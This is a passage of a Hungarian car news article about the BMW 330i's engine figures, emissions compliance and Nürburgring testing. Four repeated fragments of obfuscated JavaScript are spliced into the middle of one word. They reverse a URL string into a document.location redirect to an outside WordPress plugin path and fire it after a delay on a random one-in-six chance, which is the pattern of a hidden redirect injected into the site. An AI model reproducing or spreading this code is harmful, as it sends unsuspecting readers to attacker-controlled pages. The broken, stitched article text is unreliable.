Ha már itt tartunk, a jelenlegi 330i-ben 252 lóerőt és 350 Nm-t ‘tud’ a B48-as motoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor, az új G-sorozatú 330i esetében pedig állítólag körülbelül 260 lóerővel és 400 Nm-rel számolhatunk, annak ellenére, hogy az autó nyilván megfelel a szigorú Euro 6d-TEMP normának, ami egyben azt is jelenti, hogy benzines részecskeszűrőt kap. Az új 3-as leleplezésének közelségét mi sem mutatja jobban, minthogy a gyáriak gőzerővel tesztelik a prémium középkategóriást a Nürburgringen, sőt, náhány szerencsés külföldi újságírónak már lehetősége nyílt kipróbálni a szóban forgó 330i-t, persze alaposan leleplezve. A cikkben szereplő képeket – amelyek a Nordschleifén készültek – a BMW hivatalosan is…
- Hirdetés -